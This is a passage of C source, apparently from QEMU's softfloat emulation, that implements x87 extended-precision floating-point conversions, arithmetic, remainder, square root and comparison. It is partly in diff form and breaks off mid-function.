+*----------------------------------------------------------------------------*/ + +int32 floatx80_to_int32_round_to_zero( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig, savedASig; + int32_t z; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return (int32)(1U << 31); + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( 0x401E < aExp ) { + if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) aSign = 0; + goto invalid; + } + else if ( aExp < 0x3FFF ) { + if ( aExp || aSig ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + shiftCount = 0x403E - aExp; + savedASig = aSig; + aSig >>= shiftCount; + z = (int32_t)aSig; + if ( aSign && (z != 0x80000000) ) z = - z; + if ( ( z < 0 ) ^ aSign ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + return aSign ? (int32_t) 0x80000000 : 0x7FFFFFFF; + } + if ( ( aSig<<shiftCount ) != savedASig ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the 64-bit two's complement integer format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic---which means in particular that the conversion +| is rounded according to the current rounding mode. If `a' is a NaN, +| the largest positive integer is returned. Otherwise, if the conversion +| overflows, the largest integer with the same sign as `a' is returned. 
+*----------------------------------------------------------------------------*/ + +int64 floatx80_to_int64( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig, aSigExtra; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return (uint64_t)1 << 63; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + shiftCount = 0x403E - aExp; + if ( shiftCount <= 0 ) { + if ( shiftCount ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign + || ( ( aExp == 0x7FFF ) + && ( aSig != LIT64( 0x8000000000000000 ) ) ) + ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + aSigExtra = 0; + } + else { + shift64ExtraRightJamming( aSig, 0, shiftCount, &aSig, &aSigExtra ); + } + return roundAndPackInt64( aSign, aSig, aSigExtra STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the 64-bit two's complement integer format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic, except that the conversion is always rounded +| toward zero. If `a' is a NaN, the largest positive integer is returned. +| Otherwise, if the conversion overflows, the largest integer with the same +| sign as `a' is returned. 
+*----------------------------------------------------------------------------*/ + +int64 floatx80_to_int64_round_to_zero( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig; + int64 z; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return (uint64_t)1 << 63; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + shiftCount = aExp - 0x403E; + if ( 0 <= shiftCount ) { + aSig &= LIT64( 0x7FFFFFFFFFFFFFFF ); + if ( ( a.high != 0xC03E ) || aSig ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign || ( ( aExp == 0x7FFF ) && aSig ) ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + else if ( aExp < 0x3FFF ) { + if ( aExp | aSig ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + z = aSig>>( - shiftCount ); + if ( (uint64_t) ( aSig<<( shiftCount & 63 ) ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + if ( aSign ) z = - z; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the single-precision floating-point format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +float32 floatx80_to_float32( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp; + uint64_t aSig; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) ) { + return commonNaNToFloat32( floatx80ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + } + return packFloat32( aSign, 0xFF, 0 ); + } + shift64RightJamming( aSig, 33, &aSig ); + if ( aExp || aSig ) aExp -= 0x3F81; + return roundAndPackFloat32( aSign, aExp, (uint32_t)aSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the double-precision floating-point format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +float64 floatx80_to_float64( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp; + uint64_t aSig, zSig; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) ) { + return commonNaNToFloat64( floatx80ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + } + return packFloat64( aSign, 0x7FF, 0 ); + } + shift64RightJamming( aSig, 1, &zSig ); + if ( aExp || aSig ) aExp -= 0x3C01; + return roundAndPackFloat64( aSign, aExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the quadruple-precision floating-point format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +float128 floatx80_to_float128( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint64_t aSig, zSig0, zSig1; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return float128_default_nan; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) { + return commonNaNToFloat128( floatx80ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + } + shift128Right( aSig<<1, 0, 16, &zSig0, &zSig1 ); + return packFloat128( aSign, aExp, zSig0, zSig1 ); + +} + +/*---------------------------------------------------------------------------- +| Rounds the extended double-precision floating-point value `a' to an integer, +| and returns the result as an extended double-precision floating-point +| value. The operation is performed according to the IEC/IEEE Standard for +| Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +floatx80 floatx80_round_to_int( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp; + uint64_t lastBitMask, roundBitsMask; + floatx80 z; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aExp = extractFloatx80Exp( a ); + if ( 0x403E <= aExp ) { + if ( ( aExp == 0x7FFF ) && (uint64_t) ( extractFloatx80Frac( a )<<1 ) ) { + return propagateFloatx80NaN( a, a STATUS_VAR ); + } + return a; + } + if ( aExp < 0x3FFF ) { + if ( ( aExp == 0 ) + && ( (uint64_t) ( extractFloatx80Frac( a )<<1 ) == 0 ) ) { + return a; + } + STATUS(float_exception_flags) |= float_flag_inexact; + aSign = extractFloatx80Sign( a ); + switch ( STATUS(float_rounding_mode) ) { + case float_round_nearest_even: + if ( ( aExp == 0x3FFE ) && (uint64_t) ( extractFloatx80Frac( a )<<1 ) + ) { + return + packFloatx80( aSign, 0x3FFF, LIT64( 0x8000000000000000 ) ); + } + break; + case float_round_ties_away: + if (aExp == 0x3FFE) { + return packFloatx80(aSign, 0x3FFF, LIT64(0x8000000000000000)); + } + break; + case float_round_down: + return + aSign ? + packFloatx80( 1, 0x3FFF, LIT64( 0x8000000000000000 ) ) + : packFloatx80( 0, 0, 0 ); + case float_round_up: + return + aSign ? 
packFloatx80( 1, 0, 0 ) + : packFloatx80( 0, 0x3FFF, LIT64( 0x8000000000000000 ) ); + } + return packFloatx80( aSign, 0, 0 ); + } + lastBitMask = 1; + lastBitMask <<= 0x403E - aExp; + roundBitsMask = lastBitMask - 1; + z = a; + switch (STATUS(float_rounding_mode)) { + case float_round_nearest_even: + z.low += lastBitMask>>1; + if ((z.low & roundBitsMask) == 0) { + z.low &= ~lastBitMask; + } + break; + case float_round_ties_away: + z.low += lastBitMask >> 1; + break; + case float_round_to_zero: + break; + case float_round_up: + if (!extractFloatx80Sign(z)) { + z.low += roundBitsMask; + } + break; + case float_round_down: + if (extractFloatx80Sign(z)) { + z.low += roundBitsMask; + } + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + z.low &= ~ roundBitsMask; + if ( z.low == 0 ) { + ++z.high; + z.low = LIT64( 0x8000000000000000 ); + } + if ( z.low != a.low ) STATUS(float_exception_flags) |= float_flag_inexact; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the absolute values of the extended double- +| precision floating-point values `a' and `b'. If `zSign' is 1, the sum is +| negated before being returned. `zSign' is ignored if the result is a NaN. +| The addition is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +static floatx80 addFloatx80Sigs( floatx80 a, floatx80 b, flag zSign STATUS_PARAM) +{ + int32 aExp, bExp, zExp; + uint64_t aSig, bSig, zSig0, zSig1; + int32 expDiff; + + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + bSig = extractFloatx80Frac( b ); + bExp = extractFloatx80Exp( b ); + expDiff = aExp - bExp; + if ( 0 < expDiff ) { + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) --expDiff; + shift64ExtraRightJamming( bSig, 0, expDiff, &bSig, &zSig1 ); + zExp = aExp; + } + else if ( expDiff < 0 ) { + if ( bExp == 0x7FFF ) { + if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) ++expDiff; + shift64ExtraRightJamming( aSig, 0, - expDiff, &aSig, &zSig1 ); + zExp = bExp; + } + else { + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( ( aSig | bSig )<<1 ) ) { + return propagateFloatx80NaN( a, b STATUS_VAR ); + } + return a; + } + zSig1 = 0; + zSig0 = aSig + bSig; + if ( aExp == 0 ) { + normalizeFloatx80Subnormal( zSig0, &zExp, &zSig0 ); + goto roundAndPack; + } + zExp = aExp; + goto shiftRight1; + } + zSig0 = aSig + bSig; + if ( (int64_t) zSig0 < 0 ) goto roundAndPack; + shiftRight1: + shift64ExtraRightJamming( zSig0, zSig1, 1, &zSig0, &zSig1 ); + zSig0 |= LIT64( 0x8000000000000000 ); + ++zExp; + roundAndPack: + return + roundAndPackFloatx80( + STATUS(floatx80_rounding_precision), zSign, zExp, zSig0, zSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the absolute values of the extended +| double-precision floating-point values `a' and `b'. If `zSign' is 1, the +| difference is negated before being returned. `zSign' is ignored if the +| result is a NaN. 
The subtraction is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static floatx80 subFloatx80Sigs( floatx80 a, floatx80 b, flag zSign STATUS_PARAM ) +{ + int32 aExp, bExp, zExp; + uint64_t aSig, bSig, zSig0, zSig1; + int32 expDiff; + floatx80 z; + + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + bSig = extractFloatx80Frac( b ); + bExp = extractFloatx80Exp( b ); + expDiff = aExp - bExp; + if ( 0 < expDiff ) goto aExpBigger; + if ( expDiff < 0 ) goto bExpBigger; + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( ( aSig | bSig )<<1 ) ) { + return propagateFloatx80NaN( a, b STATUS_VAR ); + } + float_raise( float_flag_invalid STATUS_VAR); + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + return z; + } + if ( aExp == 0 ) { + aExp = 1; + bExp = 1; + } + zSig1 = 0; + if ( bSig < aSig ) goto aBigger; + if ( aSig < bSig ) goto bBigger; + return packFloatx80( STATUS(float_rounding_mode) == float_round_down, 0, 0 ); + bExpBigger: + if ( bExp == 0x7FFF ) { + if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + return packFloatx80( zSign ^ 1, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) ++expDiff; + shift128RightJamming( aSig, 0, - expDiff, &aSig, &zSig1 ); + bBigger: + sub128( bSig, 0, aSig, zSig1, &zSig0, &zSig1 ); + zExp = bExp; + zSign ^= 1; + goto normalizeRoundAndPack; + aExpBigger: + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) --expDiff; + shift128RightJamming( bSig, 0, expDiff, &bSig, &zSig1 ); + aBigger: + sub128( aSig, 0, bSig, zSig1, &zSig0, &zSig1 ); + zExp = aExp; + normalizeRoundAndPack: + return + normalizeRoundAndPackFloatx80( + STATUS(floatx80_rounding_precision), zSign, zExp, zSig0, zSig1 STATUS_VAR ); + +} + 
+/*---------------------------------------------------------------------------- +| Returns the result of adding the extended double-precision floating-point +| values `a' and `b'. The operation is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 floatx80_add( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aSign = extractFloatx80Sign( a ); + bSign = extractFloatx80Sign( b ); + if ( aSign == bSign ) { + return addFloatx80Sigs( a, b, aSign STATUS_VAR ); + } + else { + return subFloatx80Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the extended double-precision floating- +| point values `a' and `b'. The operation is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 floatx80_sub( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aSign = extractFloatx80Sign( a ); + bSign = extractFloatx80Sign( b ); + if ( aSign == bSign ) { + return subFloatx80Sigs( a, b, aSign STATUS_VAR ); + } + else { + return addFloatx80Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of multiplying the extended double-precision floating- +| point values `a' and `b'. The operation is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +floatx80 floatx80_mul( floatx80 a, floatx80 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int32 aExp, bExp, zExp; + uint64_t aSig, bSig, zSig0, zSig1; + floatx80 z; + + if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { + float_raise(float_flag_invalid STATUS_VAR); + return floatx80_default_nan; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + bSig = extractFloatx80Frac( b ); + bExp = extractFloatx80Exp( b ); + bSign = extractFloatx80Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) + || ( ( bExp == 0x7FFF ) && (uint64_t) ( bSig<<1 ) ) ) { + return propagateFloatx80NaN( a, b STATUS_VAR ); + } + if ( ( bExp | bSig ) == 0 ) goto invalid; + return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( bExp == 0x7FFF ) { + if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR ); + if ( ( aExp | aSig ) == 0 ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = floatx80_default_nan_low; + z.high = floatx80_default_nan_high; + return z; + } + return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloatx80( zSign, 0, 0 ); + normalizeFloatx80Subnormal( aSig, &aExp, &aSig ); + } + if ( bExp == 0 ) { + if ( bSig == 0 ) return packFloatx80( zSign, 0, 0 ); + normalizeFloatx80Subnormal( bSig, &bExp, &bSig ); + } + zExp = aExp + bExp - 0x3FFE; + mul64To128( aSig, bSig, &zSig0, &zSig1 ); + if ( 0 < (int64_t) zSig0 ) { + shortShift128Left( zSig0, zSig1, 1, &zSig0, &zSig1 ); + --zExp; + } + return + roundAndPackFloatx80( + STATUS(floatx80_rounding_precision), zSign, zExp, zSig0, zSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of dividing the extended double-precision 
floating-point
| value `a' by the corresponding value `b'. The operation is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 floatx80_div( floatx80 a, floatx80 b STATUS_PARAM )
{
    flag aSign, bSign, zSign;
    int32 aExp, bExp, zExp;
    uint64_t aSig, bSig, zSig0, zSig1;
    uint64_t rem0, rem1, rem2, term0, term1, term2;
    floatx80 z;

    /* x87 "unsupported" bit patterns (non-canonical explicit-integer-bit
       encodings) are rejected up front as invalid. */
    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid STATUS_VAR);
        return floatx80_default_nan;
    }
    aSig = extractFloatx80Frac( a );
    aExp = extractFloatx80Exp( a );
    aSign = extractFloatx80Sign( a );
    bSig = extractFloatx80Frac( b );
    bExp = extractFloatx80Exp( b );
    bSign = extractFloatx80Sign( b );
    zSign = aSign ^ bSign;
    /* Special-operand handling: NaN propagation, Inf/Inf -> invalid,
       Inf/x -> Inf, x/Inf -> 0, 0/0 -> invalid, x/0 -> divide-by-zero. */
    if ( aExp == 0x7FFF ) {
        if ( (uint64_t) ( aSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR );
        if ( bExp == 0x7FFF ) {
            if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR );
            goto invalid;
        }
        return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) );
    }
    if ( bExp == 0x7FFF ) {
        if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR );
        return packFloatx80( zSign, 0, 0 );
    }
    if ( bExp == 0 ) {
        if ( bSig == 0 ) {
            if ( ( aExp | aSig ) == 0 ) {
 invalid:
                float_raise( float_flag_invalid STATUS_VAR);
                z.low = floatx80_default_nan_low;
                z.high = floatx80_default_nan_high;
                return z;
            }
            float_raise( float_flag_divbyzero STATUS_VAR);
            return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) );
        }
        normalizeFloatx80Subnormal( bSig, &bExp, &bSig );
    }
    if ( aExp == 0 ) {
        if ( aSig == 0 ) return packFloatx80( zSign, 0, 0 );
        normalizeFloatx80Subnormal( aSig, &aExp, &aSig );
    }
    zExp = aExp - bExp + 0x3FFE;
    rem1 = 0;
    /* Pre-shift the dividend so the quotient lands in [1, 2). */
    if ( bSig <= aSig ) {
        shift128Right( aSig, 0, 1, &aSig, &rem1 );
        ++zExp;
    }
    /* First 64 quotient bits: estimate, then correct downward while the
       remainder (aSig:rem1 - bSig*zSig0) is negative. */
    zSig0 = estimateDiv128To64( aSig, rem1, bSig );
    mul64To128( bSig, zSig0, &term0, &term1 );
    sub128( aSig, rem1, term0, term1, &rem0, &rem1 );
    while ( (int64_t) rem0 < 0 ) {
        --zSig0;
        add128( rem0, rem1, 0, bSig, &rem0, &rem1 );
    }
    /* Second 64 quotient bits; only refine when the estimate is so close
       to a rounding boundary that the correction could matter. */
    zSig1 = estimateDiv128To64( rem1, 0, bSig );
    if ( (uint64_t) ( zSig1<<1 ) <= 8 ) {
        mul64To128( bSig, zSig1, &term1, &term2 );
        sub128( rem1, 0, term1, term2, &rem1, &rem2 );
        while ( (int64_t) rem1 < 0 ) {
            --zSig1;
            add128( rem1, rem2, 0, bSig, &rem1, &rem2 );
        }
        /* Fold any non-zero final remainder into the sticky bit. */
        zSig1 |= ( ( rem1 | rem2 ) != 0 );
    }
    return
        roundAndPackFloatx80(
            STATUS(floatx80_rounding_precision), zSign, zExp, zSig0, zSig1 STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the remainder of the extended double-precision floating-point value
| `a' with respect to the corresponding value `b'. The operation is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 floatx80_rem( floatx80 a, floatx80 b STATUS_PARAM )
{
    flag aSign, zSign;
    int32 aExp, bExp, expDiff;
    uint64_t aSig0, aSig1, bSig;
    uint64_t q, term0, term1, alternateASig0, alternateASig1;
    floatx80 z;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid STATUS_VAR);
        return floatx80_default_nan;
    }
    aSig0 = extractFloatx80Frac( a );
    aExp = extractFloatx80Exp( a );
    aSign = extractFloatx80Sign( a );
    bSig = extractFloatx80Frac( b );
    bExp = extractFloatx80Exp( b );
    /* Specials: NaN propagation, rem(Inf, x) -> invalid, rem(x, Inf) -> a,
       rem(x, 0) -> invalid. */
    if ( aExp == 0x7FFF ) {
        if (    (uint64_t) ( aSig0<<1 )
             || ( ( bExp == 0x7FFF ) && (uint64_t) ( bSig<<1 ) ) ) {
            return propagateFloatx80NaN( a, b STATUS_VAR );
        }
        goto invalid;
    }
    if ( bExp == 0x7FFF ) {
        if ( (uint64_t) ( bSig<<1 ) ) return propagateFloatx80NaN( a, b STATUS_VAR );
        return a;
    }
    if ( bExp == 0 ) {
        if ( bSig == 0 ) {
 invalid:
            float_raise( float_flag_invalid STATUS_VAR);
            z.low = floatx80_default_nan_low;
            z.high = floatx80_default_nan_high;
            return z;
        }
        normalizeFloatx80Subnormal( bSig, &bExp, &bSig );
    }
    if ( aExp == 0 ) {
        if ( (uint64_t) ( aSig0<<1 ) == 0 ) return a;
        normalizeFloatx80Subnormal( aSig0, &aExp, &aSig0 );
    }
    bSig |= LIT64( 0x8000000000000000 );
    zSign = aSign;
    expDiff = aExp - bExp;
    aSig1 = 0;
    /* |a| < |b|/2 means a is already the IEEE remainder. */
    if ( expDiff < 0 ) {
        if ( expDiff < -1 ) return a;
        shift128Right( aSig0, 0, 1, &aSig0, &aSig1 );
        expDiff = 0;
    }
    q = ( bSig <= aSig0 );
    if ( q ) aSig0 -= bSig;
    expDiff -= 64;
    /* Reduce the exponent gap 62 bits per iteration, keeping a partial
       remainder in aSig0:aSig1.  The quotient estimate is biased down by 2
       so it never overshoots. */
    while ( 0 < expDiff ) {
        q = estimateDiv128To64( aSig0, aSig1, bSig );
        q = ( 2 < q ) ? q - 2 : 0;
        mul64To128( bSig, q, &term0, &term1 );
        sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 );
        shortShift128Left( aSig0, aSig1, 62, &aSig0, &aSig1 );
        expDiff -= 62;
    }
    expDiff += 64;
    if ( 0 < expDiff ) {
        /* Final partial step: produce the last expDiff quotient bits and
           correct upward until the remainder is below b. */
        q = estimateDiv128To64( aSig0, aSig1, bSig );
        q = ( 2 < q ) ? q - 2 : 0;
        q >>= 64 - expDiff;
        mul64To128( bSig, q<<( 64 - expDiff ), &term0, &term1 );
        sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 );
        shortShift128Left( 0, bSig, 64 - expDiff, &term0, &term1 );
        while ( le128( term0, term1, aSig0, aSig1 ) ) {
            ++q;
            sub128( aSig0, aSig1, term0, term1, &aSig0, &aSig1 );
        }
    }
    else {
        term1 = 0;
        term0 = bSig;
    }
    /* Round the implicit quotient to nearest-even: if b - r < r (or equal
       with odd quotient), use the negated alternate remainder instead. */
    sub128( term0, term1, aSig0, aSig1, &alternateASig0, &alternateASig1 );
    if (    lt128( alternateASig0, alternateASig1, aSig0, aSig1 )
         || (    eq128( alternateASig0, alternateASig1, aSig0, aSig1 )
              && ( q & 1 ) )
       ) {
        aSig0 = alternateASig0;
        aSig1 = alternateASig1;
        zSign = ! zSign;
    }
    return
        normalizeRoundAndPackFloatx80(
            80, zSign, bExp + expDiff, aSig0, aSig1 STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the square root of the extended double-precision floating-point
| value `a'. The operation is performed according to the IEC/IEEE Standard
| for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 floatx80_sqrt( floatx80 a STATUS_PARAM )
{
    flag aSign;
    int32 aExp, zExp;
    uint64_t aSig0, aSig1, zSig0, zSig1, doubleZSig0;
    uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3;
    floatx80 z;

    if (floatx80_invalid_encoding(a)) {
        float_raise(float_flag_invalid STATUS_VAR);
        return floatx80_default_nan;
    }
    aSig0 = extractFloatx80Frac( a );
    aExp = extractFloatx80Exp( a );
    aSign = extractFloatx80Sign( a );
    /* Specials: NaN propagates, sqrt(+Inf) = +Inf, sqrt of any negative
       (except -0) is invalid; sqrt(+/-0) = +/-0. */
    if ( aExp == 0x7FFF ) {
        if ( (uint64_t) ( aSig0<<1 ) ) return propagateFloatx80NaN( a, a STATUS_VAR );
        if ( ! aSign ) return a;
        goto invalid;
    }
    if ( aSign ) {
        if ( ( aExp | aSig0 ) == 0 ) return a;
 invalid:
        float_raise( float_flag_invalid STATUS_VAR);
        z.low = floatx80_default_nan_low;
        z.high = floatx80_default_nan_high;
        return z;
    }
    if ( aExp == 0 ) {
        if ( aSig0 == 0 ) return packFloatx80( 0, 0, 0 );
        normalizeFloatx80Subnormal( aSig0, &aExp, &aSig0 );
    }
    /* Result exponent is half the unbiased input exponent, rebased. */
    zExp = ( ( aExp - 0x3FFF )>>1 ) + 0x3FFF;
    /* 32-bit root estimate, refined via one division step to ~64 bits. */
    zSig0 = estimateSqrt32( aExp, aSig0>>32 );
    shift128Right( aSig0, 0, 2 + ( aExp & 1 ), &aSig0, &aSig1 );
    zSig0 = estimateDiv128To64( aSig0, aSig1, zSig0<<32 ) + ( zSig0<<30 );
    doubleZSig0 = zSig0<<1;
    /* Correct the high root word while the remainder a - z0^2 is negative. */
    mul64To128( zSig0, zSig0, &term0, &term1 );
    sub128( aSig0, aSig1, term0, term1, &rem0, &rem1 );
    while ( (int64_t) rem0 < 0 ) {
        --zSig0;
        doubleZSig0 -= 2;
        add128( rem0, rem1, zSig0>>63, doubleZSig0 | 1, &rem0, &rem1 );
    }
    /* Low 64 root bits; refine only near a rounding boundary, and keep a
       sticky bit for any non-zero final remainder. */
    zSig1 = estimateDiv128To64( rem1, 0, doubleZSig0 );
    if ( ( zSig1 & LIT64( 0x3FFFFFFFFFFFFFFF ) ) <= 5 ) {
        if ( zSig1 == 0 ) zSig1 = 1;
        mul64To128( doubleZSig0, zSig1, &term1, &term2 );
        sub128( rem1, 0, term1, term2, &rem1, &rem2 );
        mul64To128( zSig1, zSig1, &term2, &term3 );
        sub192( rem1, rem2, 0, 0, term2, term3, &rem1, &rem2, &rem3 );
        while ( (int64_t) rem1 < 0 ) {
            --zSig1;
            shortShift128Left( 0, zSig1, 1, &term2, &term3 );
            term3 |= 1;
            term2 |= doubleZSig0;
            add192( rem1, rem2, rem3, 0, term2, term3, &rem1, &rem2, &rem3 );
        }
        zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 );
    }
    shortShift128Left( 0, zSig1, 1, &zSig0, &zSig1 );
    zSig0 |= doubleZSig0;
    return
        roundAndPackFloatx80(
            STATUS(floatx80_rounding_precision), 0, zExp, zSig0, zSig1 STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is equal
| to the corresponding value `b', and 0 otherwise. The invalid exception is
| raised if either operand is a NaN. Otherwise, the comparison is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_eq( floatx80 a, floatx80 b STATUS_PARAM )
{

    /* Signaling comparison: any NaN (or invalid encoding) raises invalid
       and compares unequal. */
    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)
        || (extractFloatx80Exp(a) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(a) << 1))
        || (extractFloatx80Exp(b) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(b) << 1))
       ) {
        float_raise( float_flag_invalid STATUS_VAR);
        return 0;
    }
    /* Bit-equal, or both zero with possibly different signs: the
       `(a.high | b.high) << 1 == 0' test masks off the sign bits. */
    return
           ( a.low == b.low )
        && (    ( a.high == b.high )
             || (    ( a.low == 0 )
